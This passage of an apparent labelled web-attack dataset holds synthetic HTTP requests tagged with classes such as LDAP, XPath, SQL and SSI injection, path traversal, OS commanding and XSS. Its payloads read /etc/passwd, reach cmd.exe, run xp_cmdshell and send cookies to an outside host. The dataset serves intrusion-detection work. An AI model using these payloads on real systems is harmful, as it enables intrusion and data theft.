Client-ip: 53.190.46.19
Cookie: yclbdoege=hATX4;dimrut=87851720;Agw5finyr=otjg1dhsaI;oafnzz=2993253268;Hara=ame t0ac5qs
Cookie2: $Version="641"
Date: Fri, 15 Feb 08 19:00:05 GMT
ETag: W/"sqokejaIeojg8ZyiB"
Expect: fpetd
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Fri, 26 Dec 08 14:57:11 GMT
If-Match: "R7gJHHMF2z4ELwM97an"
If-None-Match: "lbTqAHvuE1Uv8WX7LgLZ"
If-Range: "7ZN7tcfI3BR9Huz"
Max-Forwards: 972
MIME-Version: 9.5
Pragma: aokh6E='eiti'
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: Basic ZEVBdGNod3A6YWhhcnNl
Range: 4-,3-,-4
Referer: /uwsaieo/r2blntin/asysyOve/ehoon.mspx
TE: deflate;q=0.2
Trailer: Via
User-Agent: s27loh/2.0.0.4.9
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 893x680
Via: 3.8 40.37.223.23, fenf/3.4 www.v9eom.htm, 0.6 67.70.172.248
Transfer-Encoding: deflate
Upgrade: rcieEo/9.2, esrs/5.8, kEi6/4.8
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 583461727147573660
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40071
Start - Id: 37207
class: LdapInjection
GET /Ttue/rceEIdNklisdlassx/nb2SZfthchx.gif?c0eNdwA8uyaRs=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&orEiehn7e=7153&lsitme2I=6Oc%3F+&tuFi9gT=caGbVe HTTP/1.1
Host: 17.30.151.172
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: oscotht-sa;q=0.1, g-smeSils;q=0.3, nd-iiDe;q=0.5, n1tr-wonS
Cache-Control: max-age=96735
Client-ip: 98.210.207.217
Cookie: swFvosbesmm=8taoercpsmeeit;dkc=0410525
Cookie2: $Version="43"
Date: Sat, 21 Mar 09 24:40:27 GMT
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: ejgouV@q9tOejr.uk
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Mon, 26 Jan 04 21:19:33 UTC
If-Match: "g66fUmdrU_cj3yq"
If-None-Match: "l8o8XG_Hq8otMWC"
If-Range: "6AgJ1N6sjeGr0fdcE_8"
Max-Forwards: 4
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: wEne ojRSaei=oicss9
Range: 605-286224
Referer: http://eseuroe.net/eriy0k/w6itdt/o4sfcT/tsRd.mpg
TE: deflate,gzip,chunked;q=0.9
Trailer: Trailer
User-Agent: 0ohtte (7m@KWE; a3ULxw6VBK; ebmo1bXg; eBFoX44)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x8291
Via: jtt1/5.0 www.oidn.htm, HTTP/7.4 www.hnrduhow.png:3247
Transfer-Encoding: y6RE; asg5=ntblc7a
Upgrade: kfhrs/1.9, veboem/8.5
Warning: 831 www.3uaaedte.jpg "Tszrxr" 
X-Forwarded-For: 209.47.70.154
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37207
Start - Id: 49020
class: XPathInjection
GET /CGHQ3.Z/oho/npvSdWaanti5/eb/Z6XaN/gtehircce2H/iu5thXBrNS_7Z/Z4BK-Sob@/aKi6G62/obS3Y2HeH2.bin?wNsol=taayen%2Fyl%2Fa2ss%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D0%5D+++%7C++++9zaeh%2Ftz%2FiI%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D16%5D+or+++++%27wbbvbi%27++%3D++%27&nst0kws3occiih=ehcaeweft&JFvbscriptaXD6ounion=ct%24asimge%297wI%3BC HTTP/1.0
Host: 255.246.57.136
Connection: close
Accept: video/quicktime, audio/basic;q=0.2
Accept-Charset: x-mac-chinesesimp, shift_jis
Accept-Encoding: 
Accept-Language: Pcsrcaqb-ostetjt;q=0.5, gegirn-erp;q=0.8, syEt7-ioe;q=0.1, eea-h7Swaife, akiA1gtd-ochkn
Cache-Control: no-store
Client-ip: 5.173.173.39
Cookie: 7OVp8JXstdinn1=ypfssp3go;3iudtzi2nm8=rmwch5oozbgpzo;tir8ttsue3tne=357;1ceemateegizx8=8838;jeholwmcalumoi=jtAnnrsbitsreae;qgtebtpeSu=rr
Cookie2: $Version="4"
Date: Mon, 03 May 10 14:24:20 GMT
ETag: "hqas.qShK2Qyew_tqh"
Expect: dv3LLuo=wcrI;nwnh8h=xenroahc
From: oshet@mw1oE1t.com
If-Modified-Since: Sat, 27 Jun 09 23:17:44 GMT
If-Unmodified-Since: Mon, 15 Jun 09 20:16:34 UTC
If-Match: "@1be1Cv0FXPDVRArz"
If-None-Match: *
If-Range: Sun, 20 Aug 06 13:14:14 CET
Max-Forwards: 70
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest username="ehcteu"
Authorization: Digest uri=http://sl78.biz/nNoataok/erltmtm/eln1aaE/trkndnkv.php3
Range: -31
Referer: http://www.stot.fr/Mmzonns/zaiemy.mdb
TE: chunked;q=0.7,chunked
Trailer: Host
User-Agent: erouec (2PBNFi6; emhy5n; tv07JGBCqA)
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/2.4 159.197.112.36
Transfer-Encoding: compress
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 720 242.255.165.22 "tOitnuAIte3" "Sun, 01 Apr 07 23:33:20 GMT"
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 544350626543951868
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49020
Start - Id: 38326
class: LdapInjection
GET /3te/nbG/lI/tnayuieuEsetfaSar3ch/2er/4iaekSemaaiI0gio.php?saiqyiorjeaon=o%7Etv&vycglnnhns4noas=mSmKTituRHNc&wu0dseit=avQ5MIMhd8D&eteisiee=50034&8oewy=jb6Fl5ni88jl&1Tm=osOTGc&9wheeaiusn=lt&elee=hr%3F%24utce%26JI3&9eesd9=1029%29%28%26%28objectClass%3Dreus%29%28%7C%28sn+++%3D+Yt0%29%28cn%3Dri++J*%29%29&ssiGvvlwdtET2h1=upsttuSwxIenozf&w8=ncoIe&krssglcehy3r=niRntas+nr+7R%3E&afaeTitsewn4h0=Ers+ei+eerstdinaAr%7E HTTP/1.1
Host: www.ayxnmd.org
Connection: close
Accept: video/quicktime, text/xml;q=0.2, audio/*;q=0.3
Accept-Charset: ks_c_5601-1987;q=0.4, iso-8859-9, utf-8;q=0.6, iso-8859-7;q=0.3
Accept-Encoding: deflate;q=0.3, identity, identity
Accept-Language: izeGy-wde9h;q=0.2
Cache-Control: no-store
Client-ip: 222.53.139.35
Cookie: ru=8;tesseenehaldd=ocOKh
Cookie2: $Version="66"
Date: Mon, 24 Apr 06 12:26:50 GMT
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: atq5uIk=lcLmsuZ;i3ece4=Swd7rg
From: ze0mxcoe@eemraasrs.com
If-Modified-Since: Sun, 11 Jan 04 09:10:30 CET
If-Unmodified-Since: Sat, 30 Jan 10 15:23:52 CET
If-Match: "_DaoADa4rUR2024s"
If-None-Match: *
If-Range: *
Max-Forwards: 945
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest algorithm=iilrEe
Range: -717,218781-
Referer: /neh72en/auos.php3
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.7 (Machintosh; U; Mac OS X 8.8; aj-uh; rv:5.8.7) Gecko/77850727
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: deflate
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38326
Start - Id: 38239
class: LdapInjection
GET /krfse0ocioeme1il/styletot/position36y7y.pX/efsh_7uiU.dll?Sdtocd7eledeai=%29%28+++%7C+%28++++cn%3D*o++%27brien*+%29%28mail++%3D*o+%27brien*%29++&fBIRwe=93&c0rias4xad=6123410&e8=8&sevsmnwmhci=85391099 HTTP/1.1
Host: 12.130.75.152
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.5, iso-8859-3;q=0.6, x-mac-greek, x-mac-arabic;q=0.4
Accept-Encoding: 
Accept-Language: nr-xdmnmq8, etd-x9e;q=0.7, a-Sfy;q=0.3, ee-n9pzin;q=0.4
Cache-Control: no-cache
Client-ip: 33.129.121.168
Cookie: 1teoh6=874494;stuPmwst71h=n)7liket
Cookie2: $Version="43"
Date: Tue, 12 Aug 08 05:44:07 UTC
ETag: W/"4bKLWIf8NoM0jqgX"
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Wed, 05 Aug 09 02:04:33 CET
If-Unmodified-Since: Fri, 11 Jan 08 08:23:32 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9376
MIME-Version: 3.3
Pragma: eertnoe=iur
Proxy-Authorization: NTLM a1BkdXRhbmhpcnJpYm5hU3RpZW5UY0RhdDhlc3NsQ3NtY2Vwbkli
Authorization: sf91 abeoInm=etEI5u
Range: -88,49314-030507
Referer: http://www.tSoHild.net/Tyttat0i/r0pfhera/tuAio/taihho.php
TE: trailers,deflate
Trailer: Connection
User-Agent: a9rsbnhy (sX1aAPnGg)
UA-CPU: StrongARM
UA-Disp: 390,422,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 835x0812
Via: HTTP/6.7 www.2Z5yeq.png:48331
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38239
Start - Id: 37597
class: LdapInjection
PUT /NuHytmpDSuzfQ.cfm? HTTP/1.0
Content-Length: 209
Content-Language: otG
Content-Encoding: identity
Content-Location: http://www.sjpholee.com/tsapwy/I9i4s/ilaa/iuTa/honii.jsp
Content-MD5: aWF0b21PZExtUmFpc2Vlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 15:41:05 UTC
Last-Modified: Thu, 19 Apr 07 11:35:51 CET
Host: www.ypyebot.ch
Connection: close
Accept: video/quicktime;q=0.9, audio/*, audio/basic
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.5
Accept-Language: lcHhtayR-ee, ib-1hot;q=0.3
Cache-Control: no-store
Client-ip: 99.181.231.1
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="063"
Date: Sat, 24 Jun 06 08:24:44 CET
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: atns@eiaaaj.fr
If-Modified-Since: Sat, 09 Jul 05 08:39:11 GMT
If-Unmodified-Since: Sun, 02 Dec 07 11:15:13 UTC
If-Match: "cNDMqEjUm2--epdjG64C"
If-None-Match: *
If-Range: Mon, 05 Jun 06 21:42:35 GMT
Max-Forwards: 54
MIME-Version: 4.3
Pragma: w=ofh
Proxy-Authorization: Digest username="chiw"
Authorization: E0D6 toUen=M8keim
Range: 2-4,-9680
Referer: http://www.n60osewr.be/tOimbu/ssloa/mcee/rEyleEn.mdb
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: Mozilla/1.2 (X11; U; Unix 4.2; tc-ci; rv:5.9.7) Gecko/27813253
UA-CPU: PowerPC
UA-Disp: 752,1342,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/6.6 5.56.156.91
Transfer-Encoding: deflate
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cZ-mgo=24589&6sEex7i1weyMiso=356069&rbmNlhmwywitua=o33WFWEnhBh&xakAhoitdseea=8417752&odsotAelztfh=973894&nuNn8=)( |   (displayName=had*)(name    =had*)(   mail=had*  )&Cn0XYy=soasdsu8te

End - Id: 37597
Start - Id: 44715
class: PathTransversal
PUT /0-7wUtJA0U861z9Z/mTukrele7g/t4nMWNlleMeSnG/alEaR@pff27/oKbM-HNMYop@/dgssyWM8Kjx-m4cB21uA.jpeg? HTTP/1.1
Content-Length: 150
Content-Language: C9diDa4e,Xmea,olnmE
Content-Encoding: identity
Content-Location: http://www.rrOms.st/rhiica/toe6oo/emthEAne.php3
Content-MD5: RXhlYjVyZWxpYW1paVRyag==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Mar 07 01:51:39 GMT
Last-Modified: Sun, 24 Aug 08 11:37:41 UTC
Host: www.3has.net:2
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 230.63.102.101
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="777"
Date: Sat, 26 Mar 05 24:27:22 UTC
ETag: "plt73QUn8kWDZLJVBbM"
Expect: iLhe
From: ntofsxe@nilrhaih6.gov
If-Modified-Since: Thu, 10 Feb 05 01:59:17 CET
If-Unmodified-Since: Sun, 07 May 06 10:00:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 66
MIME-Version: 0.7
Pragma: naqRi='ji'
Proxy-Authorization: o7lshm rootirq=tt9s
Authorization: NTLM YWhoaWxHbnR0OHdTdTJTYWRvdXJrYXQ5bjlyaGhlZ3RvbWR0R3FlbWU=
Range: 8542-,-709
Referer: /ero6.css
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: a76oaOCEdJ http://www.mxTxh.gov
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: 2.0 www.lwretn1.jpeg, nfrR/2.0 www.rseer.html:02809, 0.5 62.95.39.95:45
Transfer-Encoding: ttmwo; whnei=IauLn8
Upgrade: hcWX/1.9, Lttry/9.2, exAer/3.6, rnt/7.8
Warning: 427 207.57.123.57 "prsEe79slxhsh" "Thu, 19 Jul 07 03:06:44 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ti=eoob&tatcnDEgfh3emd=/./../../.././../.././../.././../../../&encaapitira1ti=ueetboshYtntp&x8hriir=Stdt&taHdhea6bumu=on

End - Id: 44715
Start - Id: 43570
class: OsCommanding
GET /ZEPvsystemQGradropW/hos6bv/hPQdr3phsyteeprst/ddkjtmhnlbhms9rdc/etGvwyq83c8rYVJO/uebshxa2Lw4O4er/amho4G7C1PnM/updatezsEeK6aThpasswdqL3R/ya6s/crstlhhr/copyselect/aq@NXQ_AF.html?uKdBNbgJctA=noo24iarbhe&7cb=2358&8trzhan28=%7C++++cat++++%2Fetc%2Fpasswd+++++%7C&ck=uMeet&qu8tmplocationchildNhh=66&3moRoOno6y0cla=+8F&0nplm9hstcenck=aprocessing-instructionf6oghmv+o1n&toSwnnoa3=cS8r.1rSqi&sd=bodysess HTTP/1.1
Host: www.mdatton.fr
Connection: keep-alive
Accept: video/mpeg;q=0.7
Accept-Charset: ks_c_5601-1987, utf-7;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="361"
Date: Sat, 26 Sep 09 01:42:17 UTC
ETag: W/"2Mpn4nO2vwMkkK-Rd"
Expect: hOaepm
From: einrUhey@Loto2abrmg.st
If-Modified-Since: Fri, 02 Apr 10 03:29:44 GMT
If-Match: *
If-None-Match: "mZ@.G9219b4iciow"
If-Range: Sun, 28 Jun 09 08:07:19 CET
Max-Forwards: 8
Pragma: no-cache
Referer: /ojpSjson/trTs/1itlxe.pl
TE: trailers
User-Agent: su3ah9b4t/4.3.1.8.6
UA-Pixels: 569x2891
Via: 1.7 www.jmiteo7h.css, 2.4 116.251.164.25, HTTP/5.7 www.otsPhir.htm:059
Transfer-Encoding: deflate

null

End - Id: 43570
Start - Id: 36574
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.imms.uk:17
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 216.64.166.207
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="139"
Date: Tue, 02 Aug 05 20:39:53 UTC
ETag: W/"tdDcfOt@i5oqzz2"
Expect: t4lai=ttegsbtg;8sil
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 17 Nov 08 14:52:38 UTC
If-Unmodified-Since: Sun, 09 Aug 09 14:42:19 CET
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: "DOofAM4n6gcYEHEXwDH"
If-Range: Wed, 10 Mar 04 23:41:16 GMT
Max-Forwards: 2316
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Y2k3a3dvZWVuaWVyOWV0Y3RlYWRuZXBNNHR1N21jd2JucQ==
Range: -961935,910376-
Referer: http://www.htmasn.net/afd6/ANtn/tTe2.asp
TE: trailers,deflate
Trailer: If-Match
User-Agent: c38ja5 (e9hhH7Ml; fcX95vog; yMtwwp; wJnt7Lt5)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 186x739
Via: FTP/6.9 www.iodn.jpeg:866, 0.4 www.scCgn.jpg, 7.8 128.65.84.117
Transfer-Encoding: compress
Upgrade: t2w5X/9.8
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 33496662681000
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36574
Start - Id: 39658
class: SSI
GET /sPm/nuiay.png?uhniidodin=nE3Jqzm54a&hedohs=44&or0oimle=a+tq5ei&erludb5re6nn=98310134&kxNm0Rj=ah4n&neVieqN=483376&6slrwasioiieIlY=1143988&nscoholg=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&gzsth9tto6=1E4NJCOn&srwnSEoetsei4t=lU4mft&2aA2bk=yqYb HTTP/1.1
Host: www.maa3fewa.de
Connection: close
Accept: */*
Accept-Charset: euc-kr, iso-8859-3;q=0.9, us-ascii;q=0.0, macintosh;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 234.151.124.172
Cookie: xopetx4ileralwv=jeEoaaracih;nodu=636
Cookie2: $Version="9"
Date: Sat, 07 Nov 09 09:56:40 CET
ETag: W/"WnSUMSz_EUMDwpH_"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Sat, 06 Dec 08 02:25:39 CET
If-Unmodified-Since: Wed, 03 Oct 07 05:16:00 UTC
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: *
If-Range: *
Max-Forwards: 75
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Basic YW5pb2J0Qzc6c01vZWNp
Range: -7190
Referer: http://tepa.net/Ichnt/d3ue.pl
TE: chunked;q=0.6,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 4.8; Ce-oi; rv:0.0.3) Gecko/84709748
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8969x195
Via: FTP/3.9 45.117.3.147:0817, 2.3 43.75.210.7
Transfer-Encoding: gzip
Upgrade: o7s/5.6, dipl/2.7
Warning: 182 174.22.41.47 "UhdAhltnsetaa1re" 
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39658
Start - Id: 41069
class: SqlInjection
GET /es/e9dPIO1.html?yneepeFhntrOf=eXbi1x_4IUy&uehivofdzdeca=gat%5Ct%24nef%25U&xtn22=exec+xp_cmdshell+++%27bcp+++++%22select+*+++from+++++ea%22+++++queryout++pwdump.exe++++-c+++++-Craw++-Shackersip+-Usa+++-Ph8ck3r%27 HTTP/1.0
Host: www.qkvatnbtio.ch
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: shift_jis;q=0.4, x-mac-arabic;q=0.5, x-mac-ce;q=0.2, windows-1253;q=0.0
Accept-Encoding: identity;q=0.8, deflate
Accept-Language: ffss-0e, zhsldant-istn, xf3cb0P-ada;q=0.0, sat-a5w;q=0.5, N4ceem-c9amy
Cache-Control: no-store
Client-ip: 26.111.242.56
Cookie: txhettrjhvng6o9=429390299;enb=hc7p>1rel2ooit;inhis3e=hacj s[mmfsystemap  tt);4pzal4oiEatewt=satbu3on9;mailA3logBpTVhtpassOal= rs%;A5RSrm5Pl.=ieaeaseaectiltesd
Cookie2: $Version="049"
Date: Thu, 26 Feb 09 24:17:32 CET
ETag: W/"sUM3EPCj2Sen4b.1UGp-"
Expect: 100-continue
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Wed, 20 Apr 05 01:08:12 CET
If-Unmodified-Since: Wed, 18 May 05 09:40:38 UTC
If-Match: *
If-None-Match: *
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: NTLM bWVzRGVua2F3c2xpYXNobm5obWFueU9hN3lwdHRsaWN0dA==
Range: -4
Referer: /n9TEte/le1i.rar
TE: trailers
Trailer: Max-Forwards
User-Agent: s0zy/7.2.1.3.9
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: 4.3 135.250.9.108, HTTP/9.2 188.112.15.103
Transfer-Encoding: os5Ete; lctSt=fwwht
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41069
Start - Id: 47558
class: XSS
GET /havingpositionUkservicesHQchBautoexecWu2/e7niDeTEH1x56IJRq0h.jpg?goFqMtjaooaoIr=R&rhetrNoo=79509&ffaIdgnhla5=192766276&lsr=36207233&CnIv=%3Ca+href%3D++%22about%3A%3Cs%26%2399%3Bript++++%3E%5Bwindow.open%28%27http%3A%2F%2F221.57.127.15%2Fti.dll%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E+++++%22+++%3E&ncs=667 HTTP/1.0
Host: 88.89.239.176:15659
Connection: 3nWj
Accept: video/*
Accept-Charset: iso-2022-kr;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: 1eaeenut-a, at-taCuhayc, n-1n;q=0.6, bTa-7see;q=0.4
Cache-Control: min-fresh=414
Client-ip: 19.138.115.203
Cookie: asX=nxp_
Cookie2: $Version="143"
Date: Mon, 01 Nov 04 24:49:14 UTC
ETag: "galOyVysMRwZndb0Hy1Z"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Tue, 18 Apr 06 09:58:17 CET
If-Unmodified-Since: Sun, 09 Aug 09 16:54:39 GMT
If-Match: *
If-None-Match: "jqvrFjIShiJkSuVRclO"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.1
Pragma: toidir=AtewQr5
Proxy-Authorization: Basic TjI1b2E1OmhmZm9weg==
Authorization: Basic bkFzcjp0anRkYw==
Range: 946-214738,54330-8
Referer: /Eri6/ies7mis.txt
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 7.2; se-kw; rv:9.5.6) Gecko/36180406
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: didcT/9.6 0.176.48.211, HTTP/2.2 www.nsesac.png:7082, 6.7 www.ohiNar.html
Transfer-Encoding: ah1woi; Eerp=bRmth
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47558
Start - Id: 39759
class: SSI
GET /U@CVEmLeFx63dautoexec8/md/hLFRSgj3M857NjkHE3G/rsheo5gsnflieIvtrs/ibOVEUCqVBxVZcY/tfp4MEnJtMRyGZ.aspx?dR1d9jscoygn=%3C%21--+++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+--%3E HTTP/1.1
Host: www.Sleafeo.de:419
Connection: zjee
Accept: application/zip
Accept-Charset: iso-10646-ucs-2, x-mac-arabic, iso-8859-9;q=0.8, windows-1254, iso-8859-6;q=0.3
Accept-Encoding: 
Accept-Language: hreaetnw-cjicMsw, Thraviu-tob;q=0.3
Cache-Control: ieltefi=wrC7Tt
Client-ip: 122.119.15.78
Cookie: n09wf=c5rseaAnsyo;eebaazha=ftacei2t1raateesli;sfauyceetejn=Eesqi;ptWHJuidy_=55
Cookie2: $Version="98"
Date: Tue, 06 Jan 09 13:40:03 CET
ETag: W/"UOethF6tldF.k9x"
Expect: n5nSosn=i2ymhp;hNortnNe=sseexcj
From: ls8tIstr@r3edte.de
If-Modified-Since: Thu, 05 Aug 04 10:32:05 CET
If-Unmodified-Since: Sun, 23 Jul 06 10:39:37 CET
If-Match: "LI@ZEtIffwVKgTfZw"
If-None-Match: *
If-Range: Tue, 02 Feb 10 21:58:05 GMT
Max-Forwards: 6
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bm43Z0wzMGl1dXlhZXRhZFRPM0hjYXI2dXM4ak52a3BuYVR4
Authorization: Basic aWxodHE3OkZkbWxzMmQ=
Range: 42-82,601-32,-86
Referer: http://hksm.st/seorlrja/eLNioTu0/IdDjFtda/eloriymT.conf
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: ttre6n/8.3.7.8
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: HTTP/5.2 55.120.255.95, 9.5 193.134.181.80:2
Transfer-Encoding: gzip
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 37299896
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39759
Start - Id: 39652
class: SSI
GET /nadlt9nSWfueejr3rr.html?rl8hegd3ee3=ixta1aonait&Ih8nqoe8=nnhes&p6=r&nshsl=9&Gcat4adminEr=03249270&fOsnng2=pm1dere7nbthTpAooh&tt=299&Pq703xp_fCj1in8=%3C%21--++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&4dAamtq=tOeod5so049aGe&seny=bDZjJ&79g3DWmQpassthruU=azTjipa&neshi6l=48282633 HTTP/1.1
Host: 182.127.106.143
Connection: close
Accept: */*;q=0.7
Accept-Charset: euc-cn;q=0.6, iso-8859-1;q=0.3, shift_jis, gb2312;q=0.1
Accept-Encoding: compress;q=0.5, identity;q=0.3, deflate
Accept-Language: tnvdeyas-amvpm;q=0.2, cEd9rp-Rao
Cache-Control: only-if-cached
Client-ip: 193.240.238.168
Cookie: dzO_W=hwvDiWxy
Cookie2: $Version="2"
Date: Fri, 23 Dec 05 03:48:21 GMT
ETag: "Pte5BHI2KbP1-ib2"
Expect: 100-continue
From: lenzhrem@dasbEmim.st
If-Modified-Since: Sat, 13 Aug 05 22:07:48 CET
If-Unmodified-Since: Sat, 19 Apr 08 16:35:51 CET
If-Match: *
If-None-Match: "aI2_v0pUz3MLYh0SS"
If-Range: "H6HZBOgvt6JutE6"
Max-Forwards: 863
MIME-Version: 6.4
Pragma: no-cache
